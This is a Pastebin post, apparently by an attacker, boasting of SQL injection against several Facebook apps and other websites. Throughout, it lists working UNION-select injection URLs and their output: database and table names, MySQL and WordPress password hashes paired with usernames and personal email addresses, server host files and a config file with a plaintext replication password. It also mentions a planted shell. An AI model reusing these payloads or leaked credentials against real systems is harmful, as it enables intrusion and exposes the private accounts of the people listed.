Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Visit Facebook.com
- Let us search bugs in Web Apps.
- http://www.facebook.com/robots.txt
- oooooooooooooooooooooooooooo
- User-agent: *
- Disallow: /ac.php
- Disallow: /ae.php
- Disallow: /album.php
- Disallow: /ap.php
- Disallow: /feeds/
- Disallow: /p.php
- Disallow: /photo_comments.php
- Disallow: /photo_search.php
- Disallow: /photos.php
- User-agent: Slurp
- Disallow: /ac.php
- Disallow: /ae.php
- Disallow: /album.php
- Disallow: /ap.php
- Disallow: /feeds/
- Disallow: /p.php
- Disallow: /photo.php
- Disallow: /photo_comments.php
- Disallow: /photo_search.php
- Disallow: /photos.php
- User-agent: msnbot
- Disallow: /ac.php
- Disallow: /ae.php
- Disallow: /album.php
- Disallow: /ap.php
- Disallow: /feeds/
- Disallow: /p.php
- Disallow: /photo.php
- Disallow: /photo_comments.php
- Disallow: /photo_search.php
- Disallow: /photos.php
- # E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
- Sitemap: http://www.facebook.com/sitemap.php
- 00000000000000000000000000000000
- nothing interesting =
- http://apps.facebook.com/tvshowchat/
- I looked closely, I noticed links
- http://apps.facebook.com/tvshowchat/show.php?id=1 habit to check the variable vulnerability...
- check:
- http://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
- ooooooooooooooooooooooooooo
- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
- and other....
- oooooooooooooooooooooooooooo
- O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
- Writing exploits, I got the following:
- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
- ooooooooooooooooooooooooooo
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- 5.0.45-log <= ALERT!!!
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
- and other....
- oooooooooooooooooooooooooooo
- Database : adminclt_testsite
- Database User : adminclt_13@209.68.2.10
- MySQL Version : 5.0.67-log
- super = ] Now, we just can say that there is SQL Injection Vulnerability
- http://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
- Now we know that there is MySql 5.0.45-log
- Then let's write another exploit to display tables with information_schema.tables:
- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
- oooooooooooooooooooooooooooo
- Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
- Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
- 201 <= ALERT!!! 201 tables!
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
- and other....
- oooooooooooooooooooooooooooo
- http://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
- Database : adminclt_testsite
- Database User : adminclt_13@209.68.2.10
- MySQL Version : 5.0.67-log
- 1) AdCode
- 2) AdTrack
- 3) Admin_DataStore
- 4) Admin_User
- 5) Challenges
- 6) ChallengesCompleted
- 7) Comments
- ContactEmails
- 9) Content
- 10) ContentImages
- 11) FeaturedTemplate
- 12) FeaturedWidgets
- 13) Feeds
- 14) FolderLinks
- 15) Folders
- 16) ForumTopics
- 17) Log
- 18) LogDumps
- 19) Newswire
- 20) NotificationMessages
- 21) Notifications
- 22) Orders
- 23) OutboundMessages
- 24) Photos
- 25) Prizes
- 26) RawExtLinks
- 27) RawSessions
- 28) SessionLengths
- 29) Sites
- 30) Subscriptions
- 31) SurveyMonkeys
- 32) SystemStatus
- 33) Templates
- 34) User
- 35) UserBlogs
- 36) UserCollectives
- 37) UserInfo
- 38) UserInvites
- 39) Videos
- 40) WeeklyScores
- 41) Widgets
- 42) cronJobs
- 43) fbSessions
- Admin_User
- 1) id
- 2) name
- 3) email
- 4) password
- 5) userid
- 6) ncUid
- 7) level
- User
- 1) userid
- 2) ncUid
- 3) name
- 4) email
- 5) isAdmin
- 6) isBlocked
- 7) votePower
- remoteStatus
- 9) isMember
- 10) isModerator
- 11) isSponsor
- 12) isEmailVerified
- 13) isResearcher
- 14) acceptRules
- 15) optInStudy
- 16) optInEmail
- 17) optInProfile
- 18) optInFeed
- 19) optInSMS
- 20) dateRegistered
- 21) eligibility
- 22) cachedPointTotal
- 23) cachedPointsEarned
- 24) cachedPointsEarnedThisWeek
- 25) cachedPointsEarnedLastWeek
- 26) cachedStoriesPosted
- 27) cachedCommentsPosted
- 28) userLevel
- http://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
- Current Database : signalpa_fbmFundRraise
- Database User : signalpa_rockaja@localhost
- MySQL Version : 5.0.85-community
- DATABASE
- 1) information_schema
- 2) signalpa_CelebrityPuzzle
- 3) signalpa_EBF
- 4) signalpa_appNotification
- 5) signalpa_appnetwork
- 6) signalpa_dailyscriptures
- 7) signalpa_ebayfeed
- signalpa_fbmFundRraise
- 9) signalpa_fbmFundRraisebeta
- 10) signalpa_netcards
- 11) signalpa_paypal
- 12) signalpa_thepuzzle
- signalpa_fbmFundRraise
- 1) Campaigns
- 2) Campaigns_Temp
- 3) FB_theme
- 4) IfundDollars
- 5) Languages
- 6) Payments
- 7) Paymentsoops
- Supporters
- 9) Users
- 10) Withdrawals
- 11) invites
- 12) invites_copy
- 13) mp_passwords
- 14) payment_codes
- 15) txt_codes
- 16) valid_servers
- 17) weeklyBonus
- [+] Column: Users
- 1) id
- 2) name
- 3) email
- 4) mobile_no
- 5) address
- 6) country
- 7) password
- organisation
- 9) date_created
- 10) date_updated
- 11) status
- 12) facebook_id
- 13) isFacebookFan
- 14) verify
- 15) paypalUse
- 16) paypalEmail
- 17) bacUse
- 18) bacAcc
- 19) bacName
- 20) bacLocation
- 21) bacCountry
- 22) bacIBAN
- 23) bacSort_code
- 24) current_rank
- 25) new_rank
- 26) cronjob
- 27) max_fundraise
- [+] Column: mp_passwords
- 1) id
- 2) password
- 3) username
- 4) status
- 5) number
- 6) rc
- 7) referer
- transID
- 9) currency
- 10) transType
- 11) amount
- 12) confirmed
- 13) date
- signalpa_paypal
- 1) paypal_cart_info
- 2) paypal_payment_info
- 3) paypal_subscription_info
- [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
- [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
- [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
- Column: paypal_cart_info
- 1) txnid
- 2) itemname
- 3) itemnumber
- 4) os0
- 5) on0
- 6) os1
- 7) on1
- quantity
- 9) invoice
- 10) custom
- [+] Column : paypal_payment_info
- 1) firstname
- 2) lastname
- 3) buyer_email
- 4) street
- 5) city
- 6) state
- 7) zipcode
- memo
- 9) itemname
- 10) itemnumber
- 11) os0
- 12) on0
- 13) os1
- 14) on1
- 15) quantity
- 16) paymentdate
- 17) paymenttype
- 18) txnid
- 19) mc_gross
- 20) mc_fee
- 21) paymentstatus
- 22) pendingreason
- 23) txntype
- 24) tax
- 25) mc_currency
- 26) reasoncode
- 27) custom
- 28) country
- 29) datecreation
- http://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
- Current Database : tv
- Database User : tomkincaid@ps5008.dreamhost.com
- MySQL Version : 5.0.45-log
- [+] DATABASES
- 1) information_schema
- 2) astro
- 3) candukincaid
- 4) cemeteries
- 5) churchwpdb
- 6) countdownapp
- 7) crush
- dare
- 9) friendiq
- 10) giants
- 11) hookup
- 12) jauntlet
- 13) loccus
- 14) luciacanduwp
- 15) maps
- 16) martisor
- 17) mediax
- 18) mostlikely
- 19) music
- 20) pimpfriends
- 21) plans
- 22) politicsapp
- 23) postergifts
- 24) posters2
- 25) projectbasecamp
- 26) pwnfriends
- 27) quiz
- 28) seeall
- 29) send
- 30) supporter
- 31) swapu
- 32) tomsapps
- 33) travelbug
- [+] tab.send
- 1) app
- 2) item
- 3) itemforuser
- 4) neverblue
- 5) user
- [+] Columns
- user(12454)
- 1) userid
- 2) siteid
- 3) appkey
- 4) session
- 5) points
- 6) added
- 7) removed
- Tab. candukincaid
- 1) wp_comments
- 2) wp_links
- 3) wp_options
- 4) wp_post****
- 5) wp_posts
- 6) wp_px_albumPhotos
- 7) wp_px_albums
- wp_px_galleries
- 9) wp_px_photos
- 10) wp_px_plugins
- 11) wp_term_relationships
- 12) wp_term_taxonomy
- 13) wp_terms
- 14) wp_user****
- 15) wp_users
- [+]Column wp_users
- 1) ID
- 2) user_login
- 3) user_pass
- 4) user_nicename
- 5) user_email
- 6) user_url
- 7) user_registered
- user_activation_key
- 9) user_status
- 10) display_name
- etc...
- http://apps.facebook.com/fluff/fluffbook.php?id=[SQL Inj3ct0r]
- > ~ inj3ct0r_facebook_exploit [ENTER]
- root:*368C08021F7260A991A9D8121B7D7808C99BBB8A
- slave_user:*38E277D5CA4EAA7E9A73F8EF80813D7B5859E407
- muu:*74A45B921A1A918B18AE9B137396E5A67E006262
- monitor:*1840AE2C95804EC69321D1EE33AADFA249817034
- maatkit:*9FA5157314A2CF7448A34DA070B5D44E977A1220
- http://apps.facebook.com/snowago/area.php?areaid=[SQL Inj3ct0r]
- Database: affinispac_fb
- User: affinispac_fb@localhost
- Version: 5.0.67-community
- http://www.chinesezodiachoroscope.com/facebook/index1.php?user_id=[SQL Inj3ct0r]
- >plucky@localhost : facebook : 4.0.13-log
- etc... =]
- Next xD
- Database: thetvdb
- User: thetvdb@localhost
- Version: 5.0.51a-24-log
- [Database]: thetvdb
- [Table]
- [1]aka_seriesname
- [2]apiusers
- [3]banners
- [4]deletions
- [5]genres
- [6]imgstatus
- [7]languages
- [8]mirrors
- [9]networks
- [10]ratings
- [11]runtimes
- [12]seriesactors
- [13]seriesupdates
- [14]translation_episodename
- [15]translation_episodeoverview
- [16]translation_labels
- [17]translation_seriesname
- [18]translation_seriesoverview
- [19]tvepisodes
- [20]tvseasons
- [21]tvseries
- [22]user_episodes
- [23]users
- users:
- id,username,userpass,emailaddress,ipaddress,userlevel,languageid,favorites,
- favorites_displaymode,bannerlimit,banneragreement,active,uniqueid,
- lastupdatedby_admin,mirrorupdate
- [userpass]
- [1] *E92C1AB432D14ACA4D6618A9DFC22810363B114E:
- [2] *C62726955C4492A6A0CB7319C3928DACEAC4C66D:
- [3] *887C5DA43E5ACEE73689956A4497C0EDA956E790:
- [4] *57D6D9BF9F1962C9A006BB451FAF21693624391E:
- [5] *51121B1DC695FF11A3AEF514AAA0C487611FD98B:
- [6] 3d801aa532c1cec3ee82d87a99fdf63f
- [Database]: wiki
- [Table]
- [24]archive
- [25]categorylinks
- [26]externallinks
- [27]filearchive
- [28]hitcounter
- [29]image
- [30]imagelinks
- [31]interwiki
- [32]ipblocks
- [33]job
- [34]langlinks
- [35]logging
- [36]math
- [37]objectcache
- [38]oldimage
- [39]page
- [40]page_restrictions
- [41]pagelinks
- [42]querycache
- [43]querycache_info
- [44]querycachetwo
- [45]recentchanges
- [46]redirect
- [47]revision
- [48]searchindex
- [49]site_stats
- [50]templatelinks
- [51]text
- [52]trackbacks
- [53]transcache
- [54]user
- [55]user_groups
- [56]user_newtalk
- [57]watchlist
- user:
- user_id,user_name,user_real_name,user_password,user_newpassword,user_newpass_time,
- user_email,user_options,user_touched,user_token,user_email_authenticated,user_email_token,
- user_email_token_expires,user_registration,user_editcount
- ['user_name'] : ['user_pass']
- [1] AdrianW: [1] c6553032e2f1bcaf30aa333d0228b783:
- [2] Akwala: [2] b0c08027fd0f4deec8515c47125de023:
- [3] Aldri: [3] 0366923e9c631e65e30315eff2a14a59:
- [4] AleX: [4] afbb46ebf8c46bfb1f286df87d577f87:
- [5] Arucard: [5] e94f2b46cbfc681d2346424d7e0e3b3f:
- [6] AxesDenyd: [6] a998f782d92a8af1c683e6a0e36404e4:
- [7] Badubo: [7] 5a8920177dbf9abddefe4ff49ebbc67c:
- [8] Bjarkimg: [8] fd6a9eef25ead144df9592087bb4aec5:
- [9] BrandonB1218: [9] 62cda59cc492df4f1b1dd4d1365b5ff5:
- [10] Bsudbury: [10] 827d07956629c37855f3518374821872:
- [11] Burchard: [11] 4dc05fcbbf5850d27e627d5c4278c4cf:
- [12] Carla: [12] f41991b4dfd3b494c39751225e1faa29:
- [13] Click170: [13] 9c38b5f4673372a806f38a4dade456cc:
- [14] Coco: [14] f6770367b7ca8261a25ea797c24761aa:
- [15] Corte: [15] 9add39f338de37ce1cf52eaed38b09b2:
- [16] Crippler: [16] b3d947a82648b2707130f176204cbbfd:
- [17] Dbkungfu: [17] 0bcb65441f47097f85af79c793c74b95:
- [18] Deuce911: [18] 0220c76e24b82236675500f1e536a4be:
- [19] DigitallyBorn: [19] 3e57b721280c35ba66f2a151e19c620b:
- [20] Divervan10: [20] 1ad65386e69de0896f49c7d0fbaa0cba:
- [21] Donovan: [21] 03e4e11728c5f16fc936cb4c1d803029:
- [22] Drkshenronx: [22] ea0b8397ad79d255195780e367ccf026:
- [23] Emigrating12: [23] c45db536613d53252d00be3dc81cbde0:
- [24] Emphatic: [24] 3195961b90ea2fe0ac6d12efac8fef19:
- [25] Eta: [25] f083e5e3fd924342f77e4111df8788e1:
- [26] Farrism: [26] efef4efa85d73ca0247052687ca9683b:
- [27] Fiven: [27] 5f6dd4fde7d37c19d1e267618f55d35f:
- [28] FloVi: [28] 918f77c2a0fe807b3cff8816b8aed8ee:
- [29] Fritigern: [29] 6a16028b432de68363a20912c31bca03:
- [30] Furby: [30] 117088a3b9b504ce23c7926c8691fced:
- [31] Gerph: [31] 294d0c1541c7d892962cb51d540753c1:
- [32] Hallvar: [32] 4a5da5086b99a7d2f8aef976d364d07c:
- [33] Happyfrog: [33] 189a598dbdf27734a47c4731c099712d:
- [34] Hjeffrey: [34] 9b6daf5130c8c1a329a1e6ceff31d448:
- [35] Hsvjez: [35] fef14c536557ec3b0727246e6f57fadb:
- [36] Jase81: [36] 9e4c45874be6735b6432e5f060660a46:
- [37] Jcnetdev: [37] 88a2dc251c777d48189501a79e3d3ffa:
- [38] Jcpmcdonald: [38] 083968e4c21e6f3ff47c3fefad7c3ff7:
- [39] Jobba: [39] 699cb250cc53224bf0220d4c8f513a27:
- [40] Jschek: [40] 9bcf4c5f58764dc4c812b78276d5e412:
- [41] Juliani1024: [41] c5ea2a208e8e24bd0e3696be6de3bd07:
- [42] Kakosi: [42] b747252b62d95163a083acf54141bfc6:
- [43] KelleyCook: [43] b929c4422b9ea29845d1bf46fde7e765:
- [44] Ken brueck: [44] 1fd5e065ac6587cf351dee24f79def76:
- [45] Kennykixx: [45] 2a4a9abc742f3508fa37f37e30ed480b:
- [46] Kermtfrg: [46] cbaef6f6fa9175d419af3395f25bd814:
- [47] Keydon: [47] e9e984ed67c7e8a67f3406c5506293ec:
- [48] Kraigspear: [48] ac70640d36b6c9a3fcff3f66687fd3d5:
- [49] Krisg1984: [49] c78ea770e941c369aa3463c9a74d2f1d:
- [50] Leecole: [50] 4b3b865528e582b6a4dfc9430aec1ea8:
- [51] Livemac: [51] 0e36e0b0866b8911216c464fe8440319:
- [52] Markscore: [52] 5710cbdd3de7e28c7c93eb8e48e266a9:
- [53] Mcmanuss8: [53] 6262c8e4c7a5bb9d49743c5659d3cc40:
- [54] Mcoit: [54] 980a1ea1d9fd960208d004fe7ce928fb:
- [55] Mhale62: [55] df318f477b0c4a3e4f9f3e1ced62f607:
- [56] Mjh ca: [56] 07223e31ea0a8a617934081475d9ad52:
- [57] Mreuring: [57] 42472c97f021f725cea7670b078795a1:
- [58] Nathanlburns: [58] b7e16c89320be1b9860dcb83a082881a:
- [59] Nekocha: [59] 490c01eea35370bca2c78dce7ab633da:
- [60] Ngoring: [60] a19430b436a03fdfda8818f8cf486580:
- [61] Nighthawk92: [61] e8c8cf0eeaec4841c14ede3bcac7e6bb:
- [62] Null dev: [62] 4e744d982a173d0e1439787da27f022c:
- [63] Nunovi: [63] 7325e3df990caadddf2423cf96272fed:
- [64] Obsidianpanther: [64] 53fd2e06ca60a0640cdc617681ace453:
- [65] PLUCKYHD: [65] 2ac1aa8f8e5341788c9ca7555cc10714:
- [66] Plambert: [66] 9333604b2eefdcc01debb843373ae492:
- [67] Polargeek: [67] d0394680e24f75e7dae4e0ca23756161:
- [68] QyleCoop: [68] af49b70536b2ec2439095947bab36b43:
- [69] Ramsay: [69] 317192baea92e857e27c96e80c9f6874:
- [70] Scrooge666: [70] 8498d4d9c8de0300f0b8b3bc789d6731:
- [71] SeaLawyer: [71] 14dd3e79c6f486319e39ef694cd61a2d:
- [72] Searlea: [72] 058beaa0d231d457136015119da5aa34:
- [73] Serberus: [73] ff80d6419f6be5d76dd404fdb256eb3c:
- [74] Skillzzz: [74] 5f012a10f4eeddacfd2c495f64dbd975:
- [75] Smakkie: [75] 7143a09106678ec593eec82fcf3e66fd:
- [76] Smoko: [76] d9a1360bfcdedb3c6f48a37442d58dd8:
- [77] Smuto: [77] 20ec74ff3d72d42f7593002b0d28a540:
- [78] Stdly: [78] 4d7b92f616ffe6b420180e859bf245ba:
- [79] Swiip: [79] 120cc4e935a2c57763709392c5eb6fdf:
- [80] Szsori: [80] e7fb98c3d405dcc89314996b9c5c6cb2:
- [81] THe-BiNk: [81] 49e6e431cccf6a77bf6dafa0c96a361a:
- [82] TheStapler: [82] 7278b0168b8cfb38e64d2b6abe6991fc:
- [83] Todu: [83] 2173ff53b1fb2bbe3fd49d3d17b6f09f:
- [84] TommyD: [84] ca62c603dffc337b87a662fa904caa51:
- [85] TrocdRonel: [85] 318698c02f2f6ea7fef38e17cdaa1ac5:
- [86] Trol1234: [86] ce07cb60f64f2119a657a1427edc359e:
- [87] Trolik123456: [87] d392ceb168469aca3b21e1aaeb00f301:
- [88] Trolik23512: [88] dd16749110a800511459fa4ed655b36c:
- [89] Trololo23512: [89] 3d508eed899c625389167d2216fae370:
- [90] Weaverslodge: [90] c2c22a2c65b487915911c1d7f66b85e8:
- [91] Woodstock123: [91] ba4d45f8c7e9574dd839993a2001d5cd:
- [92] Wwarby: [92] 04409a510d208e737fa00cd97c712740:
- [93] Yabba: [93] 4b1febeed49cd185a8efbb8a61f68d74:
- [94] Zombiigraet33456904: [94] 028785be8488292e8b88137b5fd2c128:
- [95] Zombiigraet33456906: [95] 4820e4653d77bb3ccab9e7ed25155a5b:
- [96] Zubbizub1212: [96] ea2e5c44c48ce8f880a0f1627e599868:
- ---------------------------------------------------------------------------------------------------------------------------------------------------
- read /etc/hosts
- 127.0.0.1 localhost localhost.localdomain
- 192.168.1.167 140696-db2.flufffriends.com 140696-db2
- 192.168.1.166 140695-db1.flufffriends.com 140695-db1
- 192.168.1.165 140694-web2.flufffriends.com 140694-web2
- 192.168.1.164 140693-web1.flufffriends.com 140693-web1
- 69.63.176.141 api.facebook.com
- 208.116.17.80 peanutlabs.com
- ----------------------------------
- /etc/my.cnf
- #SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
- log-bin=/var/lib/mysqllogs/bin-log
- binlog-do-db=fluff2
- expire-logs-days=14
- server-id = 5
- #master-host=69.63.176.141
- #master-user=romis_user
- #master-password=romis0123
- #master-connect-retry=60
- replicate-do-db=miserman
- #log-slave-updates
- expire_logs_days = 14
- I think we found a sufficient number of vulnerabilities!
- So .. Moving on to the fun friends
- To avoid Vandal effects of script-kidds I will not give you a link to shell.php
- wp_posts
- post_password
- wp_users
- user_pass
- done.....
- WordPress! oO one of the modules installed in facebook is WordPress!
- check link: http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
- oooooooooooooooooooooooooooo
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
- Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
- 3 <= ALERT! Users! =]
- Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
- Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
- oooooooooooooooooooooooooooo
- ..> Inj3ct0r_Crach_exploit [ENTER]
- user:
- admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
- lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
- tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
- cracker:
- admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
- lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
- tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
- see request:
- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
- http://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
- goOd =] Nice Hacking old school xD
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement